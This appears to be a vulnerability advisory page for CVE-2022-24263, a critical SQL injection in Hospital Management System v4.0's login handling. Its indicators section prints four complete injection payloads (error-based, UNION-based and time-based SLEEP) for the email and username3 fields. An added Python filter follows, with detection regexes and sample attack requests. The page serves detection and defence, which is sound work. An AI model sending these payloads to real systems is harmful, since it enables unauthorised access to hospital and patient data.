CVE-2022-24263
published 2022-01-31

CVE-2022-24263: Hospital Management System v4.0 was discovered to contain a SQL injection vulnerability in /Hospital-Management-System-master/func.php via the email parameter.

Priority: P261 · critical · 9.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EXPLOIT
EPSS: 8.24% (94.2th percentile)

Affected

1 ranges
Vendor | Product | Version range | Fixed in
phpgurukul | hospital_management_system | |

Detection & IOCs (extracted from sources)

path: /Hospital-Management-System-master/func.php
command: email=riiVAqjG@https://github.com/kishan0725/Hospital-Management-System'+(select-2936) OR 1 GROUP BY CONCAT(0x7162706271,(SELECT (CASE WHEN (5080=5080) THEN 1 ELSE 0 END)),0x716b767a71,FLOOR(RAND(0)*2)) HAVING MIN(0)#from(select(sleep(20)))a)+'&password2=d3U!l9k!E4&patsub=Login
command: email=riiVAqjG@https://github.com/kishan0725/Hospital-Management-System'+(select-2730) UNION ALL SELECT 8185,8185,CONCAT(0x7162706271,0x5777534a4b68716f6d4270614362544c4954786a4f774b6852586b47694945644a70757262644c52,0x716b767a71),8185,8185,8185,8185,8185#from(select(sleep(20)))a)+'&password2=d3U!l9k!E4&patsub=Login
command: username3=CHnDaCTc'+(select-2423) OR 1 GROUP BY CONCAT(0x71626a6271,(SELECT (CASE WHEN (5907=5907) THEN 1 ELSE 0 END)),0x716b766b71,FLOOR(RAND(0)*2)) HAVING MIN(0)#from(select(sleep(20)))a)+'&password3=a5B!n6f!U1&docsub1=Login
command: username3=CHnDaCTc'+(select-3282) UNION ALL SELECT CONCAT(0x71626a6271,0x446c68526a796c4475676e54774d6b617a6977736855756f63796f43686d706c637877534a557076,0x716b766b71),4829,4829,4829,4829#from(select(sleep(20)))a)+'&password3=a5B!n6f!U1&docsub1=Login
  • Monitor POST requests to func.php, function.php, contact.php, and func3.php for SQL injection patterns including SLEEP(), UNION ALL SELECT, and FLOOR(RAND()) error-based payloads in the email, txtName, txtPhone, and username3 parameters.
  • Detect time-based blind SQLi via SLEEP() calls in POST body parameters (e.g., txtName, email); alert on SLEEP values >= 3 seconds originating from these endpoints.
  • Detect error-based SQLi using FLOOR(RAND()*2) GROUP BY CONCAT pattern in POST parameters targeting the email and username3 fields on login endpoints (patsub=Login, docsub1=Login).
  • Look for the canary strings 'qbpbq' and 'qkvzq' in HTTP responses; they are sent hex-encoded in the payload as 0x7162706271 and 0x716b767a71 and serve as the attacker's UNION/error-based SQLi confirmation markers.
  • The vulnerable application is Hospital Management System v4.0 only; the affected files are func.php, function.php, contact.php, and func3.php. Detection rules should be scoped to these specific paths to avoid false positives on other PHP applications.
  • The exploit targets POST parameters (email, txtName, txtPhone, username3); WAF or IDS rules should inspect POST body content, not just URL query strings, for these endpoints.
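
The detection notes above, written as a request filter. This is an added example, not code from the page or from the project. It assumes a form-encoded POST body is available to the inspecting component; the function names, rule names and sample requests are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Scope taken from the page: affected files and the POST parameters it names.
SCOPED_FILES = {"func.php", "function.php", "contact.php", "func3.php"}
WATCHED_PARAMS = {"email", "txtName", "txtPhone", "username3"}
SLEEP_MIN_SECONDS = 3  # alert threshold given in the detection notes
RULES = {
    "union_all_select": re.compile(r"\bunion\s+all\s+select\b", re.I),
    "error_based_floor_rand": re.compile(
        r"group\s+by\s+concat\(.*?floor\(\s*rand\([^)]*\)\s*\*\s*2\s*\)", re.I | re.S),
}
SLEEP_RE = re.compile(r"\bsleep\(\s*(\d+(?:\.\d+)?)\s*\)", re.I)
# Markers from the detection notes; other samples on the page use different values.
RESPONSE_MARKERS = ("qbpbq", "qkvzq")


def inspect_request(method, path, body):
    """Return sorted (param, rule) hits for one request; [] when out of scope."""
    filename = path.split("?", 1)[0].rsplit("/", 1)[-1].lower()
    if method.upper() != "POST" or filename not in SCOPED_FILES:
        return []
    hits = set()
    # parse_qsl URL-decodes each value once before the patterns are applied.
    for name, value in parse_qsl(body, keep_blank_values=True):
        if name not in WATCHED_PARAMS:
            continue
        hits.update((name, rule) for rule, rx in RULES.items() if rx.search(value))
        if any(float(s) >= SLEEP_MIN_SECONDS for s in SLEEP_RE.findall(value)):
            hits.add((name, "time_based_sleep"))
    return sorted(hits)


def response_has_marker(response_body):
    """True when a response echoes one of the confirmation markers."""
    return any(marker in response_body for marker in RESPONSE_MARKERS)


# Constructed sample requests (not captured traffic), shaped like the page's IOCs.
SAMPLES = [
    ("POST", "/Hospital-Management-System-master/func.php",
     "email=a%40b.test%27+OR+1+GROUP+BY+CONCAT(0x7162706271,1,FLOOR(RAND(0)*2))%23&patsub=Login"),
    ("POST", "/Hospital-Management-System-master/contact.php", "txtName=x%27%2B(select(sleep(20)))%2B%27"),
    ("POST", "/Hospital-Management-System-master/func.php", "email=nurse%40example.test&patsub=Login"),
]

if __name__ == "__main__":
    for method, path, body in SAMPLES:
        print(path, inspect_request(method, path, body))
```

Values are decoded only once, so a deployment that sees double-encoded bodies needs to normalise them before calling `inspect_request`.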

CVSS provenance

nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P